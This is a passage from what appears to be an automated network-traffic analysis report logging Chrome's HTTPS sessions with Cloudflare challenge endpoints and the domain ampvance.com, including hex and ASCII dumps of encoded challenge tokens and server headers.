                                                      2024-03-05 13:24:44 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 53 00 00 00 2a 08 02 00 00 00 40 fd f0 5e 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDRS*@^IDAT$IENDB`
                                                      2024-03-05 13:24:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.549739104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:44 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1183635583:1709641629:fYb9hZweqxu5iZMV1wvhRAEVl-boZlvEU6H59iz174E/85fa6d617a504235/e4bc76bcbb19b36 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:44 UTC386INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 05 Mar 2024 13:24:44 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: Le+5QxeZU0P0C6g9SDncmQ==$JdnUxI1eu08VgkulhQl7Fg==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d948bba17ad-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:44 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-03-05 13:24:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.549744104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:00 UTC918OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1183635583:1709641629:fYb9hZweqxu5iZMV1wvhRAEVl-boZlvEU6H59iz174E/85fa6d617a504235/e4bc76bcbb19b36 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 30023
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: e4bc76bcbb19b36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:25:00 UTC16384OUTData Raw: 76 5f 38 35 66 61 36 64 36 31 37 61 35 30 34 32 33 35 3d 61 4c 49 4f 57 66 4b 55 72 54 49 4b 49 66 70 63 6e 25 32 62 7a 2b 32 65 69 70 35 2b 77 63 48 2b 4f 4f 66 49 4b 48 2b 31 4f 69 4c 66 79 4b 2b 64 66 2b 63 53 7a 51 2b 79 44 2b 62 4f 49 4c 4b 70 6d 2b 68 4f 65 70 2b 73 72 33 2b 4b 31 2b 59 34 72 2b 6b 4f 59 45 70 72 4f 70 49 2b 64 70 35 49 2b 37 52 2b 36 33 53 78 2b 6b 4f 66 55 77 47 4f 65 77 2b 45 4f 66 35 5a 6f 6a 2b 36 34 6d 65 79 4f 2b 55 2b 41 5a 6e 4f 4f 2b 63 65 2b 63 37 49 2b 63 34 66 69 4f 63 6d 2b 66 4c 4c 72 4f 66 62 69 7a 49 66 65 2b 63 79 51 62 46 7a 35 46 65 33 55 2b 54 42 78 46 56 7a 72 51 49 2b 33 7a 42 49 4d 64 52 79 72 51 4c 2b 7a 77 69 66 6c 4f 63 6a 45 6d 45 66 2b 5a 4e 70 4b 35 35 4e 2b 31 5a 4e 6b 53 49 50 30 34 38 61 44 34 35 66
                                                      Data Ascii: v_85fa6d617a504235=aLIOWfKUrTIKIfpcn%2bz+2eip5+wcH+OOfIKH+1OiLfyK+df+cSzQ+yD+bOILKpm+hOep+sr3+K1+Y4r+kOYEprOpI+dp5I+7R+63Sx+kOfUwGOew+EOf5Zoj+64meyO+U+AZnOO+ce+c7I+c4fiOcm+fLLrOfbizIfe+cyQbFz5Fe3U+TBxFVzrQI+3zBIMdRyrQL+zwiflOcjEmEf+ZNpK55N+1ZNkSIP048aD45f
                                                      2024-03-05 13:25:00 UTC13639OUTData Raw: 2b 59 78 69 56 4b 59 4f 50 35 46 53 66 4d 67 71 74 58 4b 53 4b 34 2b 56 2b 6b 2b 31 6d 63 36 6d 6f 2b 63 4f 63 43 4f 76 53 66 34 63 35 56 67 78 59 4f 63 41 2b 4a 72 36 78 4b 55 2b 52 4f 66 2b 66 66 2b 6c 41 31 49 2b 6a 2b 42 4c 66 2b 4b 54 2b 79 4f 4b 72 63 37 2b 35 2b 36 4f 63 43 4f 73 4c 54 34 66 62 2b 67 4f 65 2b 63 6e 2b 34 4f 77 4c 4b 48 2b 6d 2b 54 68 7a 4d 53 49 72 36 4a 4c 53 2b 38 4d 68 36 2b 44 2b 76 2b 70 4f 63 72 2b 6d 2b 2b 6f 4b 4c 78 77 4f 49 72 66 42 4f 50 78 31 36 66 55 2b 41 61 58 2b 59 70 2b 77 2b 46 78 63 76 2b 64 35 4e 49 4b 6a 2b 66 4f 36 43 2b 34 4b 6d 4f 63 34 66 6a 2b 4b 4f 43 4f 65 62 2b 65 4f 63 34 63 69 4b 75 2b 59 54 63 33 2b 50 2b 62 2b 4b 70 2b 61 55 31 36 4b 4e 78 4d 4f 65 52 66 45 4f 79 4f 71 67 78 30 53 65 70 2b 4f 63 35
                                                      Data Ascii: +YxiVKYOP5FSfMgqtXKSK4+V+k+1mc6mo+cOcCOvSf4c5VgxYOcA+Jr6xKU+ROf+ff+lA1I+j+BLf+KT+yOKrc7+5+6OcCOsLT4fb+gOe+cn+4OwLKH+m+ThzMSIr6JLS+8Mh6+D+v+pOcr+m++oKLxwOIrfBOPx16fU+AaX+Yp+w+Fxcv+d5NIKj+fO6C+4KmOc4fj+KOCOeb+eOc4ciKu+YTc3+P+b+Kp+aU16KNxMOeRfEOyOqgx0Sep+Oc5
                                                      2024-03-05 13:25:00 UTC1159INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:00 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-chl-out: dntbXl9eepwKwaoo/4wYECh7FKjS2LzfE+b7SievJ5RaO8ZPRkyGUMb8qLXG3AY3XSOJMVSK9orgAx8VEWYD5jnKLicVFF5vb2IFdX4hXGx4FjT5z7GYCV3cFvkPh+0U$yM0+VQUGR2R+BhGNvM0E8A==
                                                      cf-chl-out-s: qE7yButYrn6jrObE3Nui9SN7WQW3+f/aRvD2wtvEU9EY8SKMyb23REzqX0Hh23IWSSCa0VvdN6Blwa2Az4eg8B1VDCK6WjMUheM0HPqzAg0hCMS39d0U6BQZES4uiC244Na3Bx4eN23k/unoI6UZJoVbYt/vHQSe6HRqE96/oBufnW9rQAkRacUuRWX6Fj3iHnBx7QEu4Fi8k59+QJQpK0wDIpzAZNNUaNtU1DUc60T5H1L+Buv48Rx6DNdQntP3zYr3bZcZhU6nmrCZjbFLdZdcij44OFHZUVSqzBFU5O8jO5h6GsxFs5QKp+GARJmY2IPykeYBSsAUAWghtx0pxs0adhCTqpGLZmoZ7975YbYdsh3zWpPfXFtNn/7XnQIEfmWJitj+VTCD+/anACVrAIxwjjHnsfsLanDlZEIOdvc1pGWoOQ0FdEy7LhPG4yjriYjhFvwy6JTytcH8/1fr4BNnSMCCoy84MA/v2IjLr7EP4K+zI36jyHKotIpcCC/1ysvz6UURECXpLLS5cMg21XTGDzUOSxGHvreDcTHHqDb+kDU1VsHwyWPzM4wdXVnle6eTf+40cAdR7z93vTf9dObjKqNUIKt9dbmXDQmDGjQ2pgmFYQ/zekZc1d11gZEliPmyFNazhJ6ss2nWdU8eF5NqM17nRU7g0LpvQY65bLocSQaLfXTI7OigTpkD4bheyWyKKr7bWfHp9PSUlXWs4A==$m2lxzJbesMKYovDXSAzAtA==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6df51df641d8-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:00 UTC210INData Raw: 64 64 38 0d 0a 70 6e 61 4b 6c 72 43 34 6a 5a 5a 38 73 4b 47 76 66 34 6a 46 78 6f 4f 2b 68 34 37 4e 73 49 72 4b 77 62 50 47 71 37 6e 4b 78 38 6a 64 33 62 54 54 31 36 2b 7a 34 73 57 30 78 4b 2f 4a 34 37 62 64 37 4d 71 33 76 4b 7a 4b 35 4e 2b 77 7a 75 6a 54 78 73 2f 57 32 4d 66 47 78 76 6a 50 34 4f 38 45 74 76 62 61 41 39 6a 35 33 76 72 67 41 4d 55 41 33 66 44 4a 38 41 6a 6d 41 50 41 55 36 39 54 74 45 2f 62 72 32 53 49 53 48 79 41 64 42 4f 4c 68 45 2b 50 69 35 69 30 57 47 76 67 78 42 67 58 38 4b 68 59 6a 41 69 73 62 4a 79 33 79 44 2f 30 6f 44 67 38 44 46 53 4d 33 50 68 55 68 4a 6a 34 58 4b 79 74 49 45 43 73 36 43 6b 34 6f 55
                                                      Data Ascii: dd8pnaKlrC4jZZ8sKGvf4jFxoO+h47NsIrKwbPGq7nKx8jd3bTT16+z4sW0xK/J47bd7Mq3vKzK5N+wzujTxs/W2MfGxvjP4O8EtvbaA9j53vrgAMUA3fDJ8AjmAPAU69TtE/br2SISHyAdBOLhE+Pi5i0WGvgxBgX8KhYjAisbJy3yD/0oDg8DFSM3PhUhJj4XKytIECs6Ck4oU
                                                      2024-03-05 13:25:00 UTC1369INData Raw: 67 34 6d 46 69 4d 61 52 6c 5a 4e 48 69 30 78 54 44 55 74 54 53 52 46 51 46 6f 37 53 43 55 6f 51 57 5a 64 50 56 30 72 62 58 5a 33 50 79 35 61 63 7a 5a 32 4e 6d 39 52 65 58 67 30 50 6c 70 51 65 31 46 45 58 32 6c 34 5a 32 4a 6a 59 34 6d 4c 53 34 47 4e 6c 59 46 69 61 59 6c 61 63 4a 61 48 57 6c 5a 78 6d 59 79 53 66 33 5a 64 6f 70 4e 6e 64 6c 32 71 71 6d 43 4c 63 4b 64 72 67 59 64 79 6c 59 43 77 63 72 53 38 71 6e 61 6d 6c 72 69 54 65 4a 53 39 77 4d 4f 64 6c 61 71 65 74 63 4b 69 7a 49 65 74 30 59 33 49 78 63 4f 75 78 61 4b 77 70 73 61 33 74 61 72 4c 72 39 2b 63 33 4e 57 38 32 2b 4c 54 71 4c 72 45 78 36 69 2b 32 64 47 73 34 2f 4f 39 72 38 66 6d 2b 66 66 49 32 75 66 50 30 39 54 75 33 39 62 6a 37 38 53 2f 38 65 4f 2f 2f 67 44 64 37 76 76 6b 33 2b 54 6c 79 67 6a 79
                                                      Data Ascii: g4mFiMaRlZNHi0xTDUtTSRFQFo7SCUoQWZdPV0rbXZ3Py5aczZ2Nm9ReXg0PlpQe1FEX2l4Z2JjY4mLS4GNlYFiaYlacJaHWlZxmYySf3ZdopNndl2qqmCLcKdrgYdylYCwcrS8qnamlriTeJS9wMOdlaqetcKizIet0Y3IxcOuxaKwpsa3tarLr9+c3NW82+LTqLrEx6i+2dGs4/O9r8fm+ffI2ufP09Tu39bj78S/8eO//gDd7vvk3+Tlygjy
                                                      2024-03-05 13:25:00 UTC1369INData Raw: 56 59 47 52 68 61 47 46 52 68 48 31 41 78 57 47 55 6e 4b 47 52 6d 51 47 52 49 4b 69 38 78 61 7a 42 76 59 45 74 34 54 79 31 33 4e 33 68 37 66 54 4e 59 65 49 4a 43 4f 46 56 45 52 33 4f 49 69 49 74 68 6a 30 2b 4f 65 35 53 4c 55 34 4a 4e 6b 46 5a 59 57 59 75 62 63 5a 79 51 6e 57 42 63 56 71 4b 50 71 4a 65 6d 6b 36 64 71 61 4b 70 2b 71 57 35 6b 67 71 32 78 64 4c 53 30 64 71 5a 34 65 6e 69 71 77 4c 71 2b 6c 62 39 32 77 61 2b 38 77 4d 57 30 6c 59 79 4d 6f 64 44 49 7a 5a 44 54 68 74 4c 44 6f 59 71 76 6d 72 57 34 71 72 6e 53 75 36 75 67 77 4d 4f 63 34 62 54 41 74 73 61 70 76 2b 44 68 78 74 69 71 32 75 43 71 30 39 2f 75 74 4d 37 51 73 39 7a 62 30 63 7a 65 31 62 2b 37 32 41 59 42 41 64 76 70 2b 4d 54 31 31 63 59 45 2b 64 30 43 33 38 72 31 42 64 55 45 44 52 62 6f 39
                                                      Data Ascii: VYGRhaGFRhH1AxWGUnKGRmQGRIKi8xazBvYEt4Ty13N3h7fTNYeIJCOFVER3OIiIthj0+Oe5SLU4JNkFZYWYubcZyQnWBcVqKPqJemk6dqaKp+qW5kgq2xdLS0dqZ4eniqwLq+lb92wa+8wMW0lYyModDIzZDThtLDoYqvmrW4qrnSu6ugwMOc4bTAtsapv+Dhxtiq2uCq09/utM7Qs9zb0cze1b+72AYBAdvp+MT11cYE+d0C38r1BdUEDRbo9
                                                      2024-03-05 13:25:00 UTC603INData Raw: 5a 5a 44 74 54 5a 43 6b 2f 57 32 6c 6e 4c 55 49 39 62 44 46 4a 4c 53 35 66 52 6b 6c 33 55 57 52 4e 64 6d 64 4a 66 58 6c 42 51 56 6c 46 67 32 57 44 51 6c 39 61 57 6f 65 47 58 6d 52 5a 5a 48 79 54 6a 47 75 4d 6d 56 69 45 6d 48 32 63 58 58 70 70 6e 48 61 6b 65 6c 36 51 6b 36 6c 69 66 58 61 6c 70 57 53 63 67 6d 71 66 68 70 47 76 64 57 32 6d 63 4c 53 4b 69 62 53 55 69 6e 76 43 76 62 43 56 66 4b 36 35 6b 4d 72 46 75 38 32 47 75 4b 4b 66 7a 61 53 38 77 74 54 54 76 38 76 61 78 4d 69 75 33 4e 66 4d 7a 75 47 55 72 70 71 63 70 4e 65 69 35 62 2f 43 35 65 66 61 36 4f 2f 76 72 38 61 38 37 4e 2f 52 73 2f 54 7a 36 4e 62 38 35 39 71 36 79 64 51 46 34 62 38 42 31 51 6f 4a 33 2b 6b 4d 79 67 7a 38 45 64 45 41 78 51 72 55 30 2f 62 50 45 42 4d 45 45 52 54 62 43 64 72 67 32 50
                                                      Data Ascii: ZZDtTZCk/W2lnLUI9bDFJLS5fRkl3UWRNdmdJfXlBQVlFg2WDQl9aWoeGXmRZZHyTjGuMmViEmH2cXXppnHakel6Qk6lifXalpWScgmqfhpGvdW2mcLSKibSUinvCvbCVfK65kMrFu82GuKKfzaS8wtTTv8vaxMiu3NfMzuGUrpqcpNei5b/C5efa6O/vr8a87N/Rs/Tz6Nb859q6ydQF4b8B1QoJ3+kMygz8EdEAxQrU0/bPEBMEERTbCdrg2P
                                                      2024-03-05 13:25:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.549745104.17.3.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:00 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1183635583:1709641629:fYb9hZweqxu5iZMV1wvhRAEVl-boZlvEU6H59iz174E/85fa6d617a504235/e4bc76bcbb19b36 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:25:00 UTC386INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 05 Mar 2024 13:25:00 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: +iRBrmrrFsF1Oca4VDTZnQ==$uGU+J9OZDWWRg3BCXkJapg==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6df86b93c42f-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:00 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-03-05 13:25:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.549746104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:00 UTC1048OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1869225531:1709641461:kuxJ_DvE-BzM62NrsAoJvN18Oo0XGBWfSTPIHUFJYAY/85fa6d536af119eb/a96d5f6b92698dc HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      Content-Length: 3203
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      CF-Challenge: a96d5f6b92698dc
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ampvance.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ampvance.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:25:00 UTC3203OUTData Raw: 76 5f 38 35 66 61 36 64 35 33 36 61 66 31 31 39 65 62 3d 64 36 69 59 50 46 77 2d 51 75 69 77 69 46 44 78 4c 25 32 62 79 2b 71 6b 65 77 56 2b 6d 59 64 4b 5a 38 2b 31 2b 4e 4b 67 2d 2b 56 46 59 41 59 65 65 77 41 65 2b 5a 79 2b 77 44 2b 66 44 59 71 4b 65 2d 2b 54 6f 6b 59 46 54 2b 35 4c 38 59 4e 2b 62 42 4b 2b 61 2b 62 6c 38 2b 4e 59 65 49 2b 58 2b 5a 32 38 2b 71 42 79 59 2b 36 31 43 46 2d 46 2b 44 35 65 2b 73 79 4b 78 6c 77 56 59 65 66 4d 63 6d 50 77 32 7a 6b 2b 64 43 2b 34 4e 2b 75 39 4e 2b 78 69 51 34 6c 51 6a 49 56 32 4b 2b 48 53 7a 46 36 59 78 46 70 63 4b 63 2b 77 53 2d 6a 73 77 68 4d 67 7a 6c 4f 63 43 2b 74 59 77 54 63 32 66 53 32 2b 4b 72 63 59 46 6a 2b 2b 39 6a 2b 53 2b 59 4f 59 77 49 6b 78 42 36 4e 4a 38 2b 44 59 46 72 4d 2b 2b 52 67 33 59 2b 46 50
                                                      Data Ascii: v_85fa6d536af119eb=d6iYPFw-QuiwiFDxL%2by+qkewV+mYdKZ8+1+NKg-+VFYAYeewAe+Zy+wD+fDYqKe-+TokYFT+5L8YN+bBK+a+bl8+NYeI+X+Z28+qByY+61CF-F+D5e+syKxlwVYefMcmPw2zk+dC+4N+u9N+xiQ4lQjIV2K+HSzF6YxFpcKc+wS-jswhMgzlOcC+tYwTc2fS2+KrcYFj++9j+S+YOYwIkxB6NJ8+DYFrM++Rg3Y+FP
                                                      2024-03-05 13:25:00 UTC1268INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:00 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      set-cookie: cf_chl_rc_m=;Expires=Mon, 04 Mar 2024 13:25:00 GMT;SameSite=Strict
                                                      cf-chl-out: ChSHTo+5lZeBKlRIGq1SPyTJVvMtvcfmB9jXvNiwH2WCO6o2bcnzPn/tcO3vbwZWuTJ0lc0iqU8WibUU2FOojw==$oGcZSnN33CuBV3T00zV4VQ==
                                                      cf-chl-out-s: +PalPGcJ/ZCISjnlbmoJA2tR6Icri8pNVWdBmeZm2LIDPXw0MmmC1wBvkfAUKi+A2ZYzIWoJD6k3O14PeNQL0VHCDXyjQQJOsbnDT776+Vdc8Eq0x1jbdnKpO2K89lnS3MWVIXA0zNuHSE05XRb2H9MJcAQgKfJQH/ir2sM/x7jTqHl3pyGaR/EnBl+Kk3oIjfL9+mOpj9yamkl4tvDEYjhAFeCXue8JpRIAuq3jxkfnwvQMKH5cuD6FOeyGx5602Iasz0vLfw7sB2/v7/Dc8rOT55R4S8j/2AvISk/fnyvmLl5TbAHvIMGO/7r8rpswun5YArVASgds3eYcA9VXrJFxI2Q+YUCNkh4RuA7xM0TpnG17ub5QvWu0gI0kywHqxWDLxjdPQ/bcRoPlMo7MXOSVstlL+5lba63m8S66iD9gaMsD3DlZpfT06awUPxdJIJ8m6jYp7zNXzFwC8aKU6w==$skTp/vvU1/HzFpywnHWZjQ==
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n8Nv%2FMOOBffHGyK4gtajEceyFbUj7fPHjEPk%2FvA2lUUiX%2FfhVrJNOP1OxtNmaStoRglQUj0LcY5PD8us9ata4hEYMF4tXYzeX%2BRSBZrIApkViv3mo%2Bf3HkKvu3tclmg%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6df7ba474374-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:00 UTC101INData Raw: 65 30 30 0d 0a 66 32 74 36 5a 70 64 76 68 6e 61 65 6d 6f 35 72 6f 33 6c 77 66 6e 36 51 71 48 4b 45 64 6f 56 72 67 59 6d 52 71 59 57 4f 69 62 4b 4c 75 4b 2b 78 6b 61 79 73 64 61 36 50 73 4d 47 5a 6d 38 5a 38 6e 5a 2f 48 6c 35 57 6e 75 35 36 61 71 5a 32 71 76 34 33 56 6e 73 65 76 7a 74 69 62 73 74 62 65
                                                      Data Ascii: e00f2t6Zpdvhnaemo5ro3lwfn6QqHKEdoVrgYmRqYWOibKLuK+xkaysda6PsMGZm8Z8nZ/Hl5Wnu56aqZ2qv43Vnsevztibstbe
                                                      2024-03-05 13:25:00 UTC1369INData Raw: 6b 64 79 58 32 61 43 76 33 72 4b 39 73 75 4f 70 78 61 4f 39 6f 4d 76 4d 77 75 4c 4e 30 4d 62 49 7a 2b 72 6b 30 39 66 51 79 66 6a 39 31 50 57 37 2b 75 7a 6a 77 77 48 47 2f 65 59 46 39 4d 6f 4f 44 50 67 44 7a 64 7a 72 42 78 67 4a 30 74 62 72 44 68 50 76 39 74 58 53 49 4f 72 5a 38 68 6b 54 43 51 67 68 49 53 55 66 43 4f 6b 72 42 52 37 6b 4e 43 38 4a 44 78 45 68 4f 51 4d 53 50 66 67 38 45 52 73 34 4f 67 45 46 4d 52 38 49 51 6b 59 38 4b 43 34 48 50 45 38 39 4c 56 4a 56 55 6a 49 6b 56 7a 6b 57 47 55 34 5a 50 44 4a 56 50 55 4d 68 51 54 46 69 48 7a 31 52 4a 55 73 38 52 55 46 77 4f 57 39 50 58 45 31 44 56 30 78 55 63 48 6f 79 64 32 39 6d 57 54 35 38 64 48 4a 50 66 33 42 76 56 6e 73 38 62 49 4e 33 61 6b 46 4e 5a 6c 35 73 54 35 53 41 64 49 46 52 61 32 61 45 61 46 43
                                                      Data Ascii: kdyX2aCv3rK9suOpxaO9oMvMwuLN0MbIz+rk09fQyfj91PW7+uzjwwHG/eYF9MoODPgDzdzrBxgJ0tbrDhPv9tXSIOrZ8hkTCQghISUfCOkrBR7kNC8JDxEhOQMSPfg8ERs4OgEFMR8IQkY8KC4HPE89LVJVUjIkVzkWGU4ZPDJVPUMhQTFiHz1RJUs8RUFwOW9PXE1DV0xUcHoyd29mWT58dHJPf3BvVns8bIN3akFNZl5sT5SAdIFRa2aEaFC
                                                      2024-03-05 13:25:00 UTC1369INData Raw: 72 76 45 6d 71 44 42 33 38 72 48 71 64 79 75 76 72 2f 76 33 64 54 46 39 63 79 33 77 73 54 73 72 37 44 4d 33 2f 4c 78 30 4d 37 31 39 2f 50 58 2b 2f 58 33 42 2b 50 41 36 65 55 4e 7a 68 50 6b 78 2b 33 69 2b 50 6f 51 32 4f 54 58 44 74 6a 62 49 76 55 59 39 52 59 47 47 68 6b 41 2f 69 77 6e 44 2f 7a 6f 4c 50 6b 79 48 69 73 4c 38 44 50 34 47 51 37 78 45 66 4d 64 39 79 34 2f 41 30 55 45 42 51 38 51 4d 30 73 66 54 55 67 33 44 56 42 50 4a 53 78 56 51 79 55 57 49 43 30 56 49 78 4d 79 4d 52 39 68 49 55 73 6a 47 6a 70 50 4a 6d 6c 42 4f 55 51 6b 52 54 6f 34 63 54 46 46 53 54 78 66 64 31 45 77 59 7a 46 44 4c 6a 31 52 57 44 64 72 67 31 77 32 52 49 64 67 51 48 61 4c 5a 59 31 4e 58 49 71 43 69 32 31 6a 62 6d 70 6c 62 56 56 76 6a 59 53 63 64 33 57 49 62 48 53 6a 70 49 56 67
                                                      Data Ascii: rvEmqDB38rHqdyuvr/v3dTF9cy3wsTsr7DM3/Lx0M719/PX+/X3B+PA6eUNzhPkx+3i+PoQ2OTXDtjbIvUY9RYGGhkA/iwnD/zoLPkyHisL8DP4GQ7xEfMd9y4/A0UEBQ8QM0sfTUg3DVBPJSxVQyUWIC0VIxMyMR9hIUsjGjpPJmlBOUQkRTo4cTFFSTxfd1EwYzFDLj1RWDdrg1w2RIdgQHaLZY1NXIqCi21jbmplbVVvjYScd3WIbHSjpIVg
                                                      2024-03-05 13:25:00 UTC752INData Raw: 58 49 76 75 37 67 76 36 6a 64 72 37 44 57 38 4f 37 50 74 4e 6e 6b 32 2f 53 34 31 65 37 4c 41 64 6e 6b 30 41 63 49 41 4e 69 39 35 2b 48 6b 44 64 6e 50 37 4d 73 4f 38 77 30 53 31 4d 73 4e 45 78 55 4f 2f 42 76 64 2b 39 77 63 38 64 77 6c 4a 43 66 7a 48 76 67 4d 44 67 62 72 49 69 51 30 4d 75 77 72 42 78 55 47 4c 67 34 64 37 69 67 49 4c 77 73 55 41 68 38 74 44 30 41 68 46 53 52 4a 49 78 6b 57 51 79 59 2f 51 43 49 53 56 6b 73 6a 49 79 63 75 4e 56 6c 47 48 6a 5a 67 4f 32 42 68 4e 31 4a 54 4a 55 59 78 50 53 49 32 4e 55 39 72 57 54 38 2f 4c 47 42 45 59 57 56 6b 53 48 6c 35 61 45 56 4b 52 30 6c 4a 59 6d 51 36 63 31 45 39 68 45 52 71 55 34 4a 64 69 6b 56 67 65 30 78 77 6b 47 65 43 54 6f 35 71 56 35 43 51 57 6e 4f 50 66 35 68 76 64 70 71 4f 5a 6f 46 6f 63 71 42 32 5a
                                                      Data Ascii: XIvu7gv6jdr7DW8O7PtNnk2/S41e7LAdnk0AcIANi95+HkDdnP7MsO8w0S1MsNExUO/Bvd+9wc8dwlJCfzHvgMDgbrIiQ0MuwrBxUGLg4d7igILwsUAh8tD0AhFSRJIxkWQyY/QCISVksjIycuNVlGHjZgO2BhN1JTJUYxPSI2NU9rWT8/LGBEYWVkSHl5aEVKR0lJYmQ6c1E9hERqU4JdikVge0xwkGeCTo5qV5CQWnOPf5hvdpqOZoFocqB2Z
                                                      2024-03-05 13:25:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.549747104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
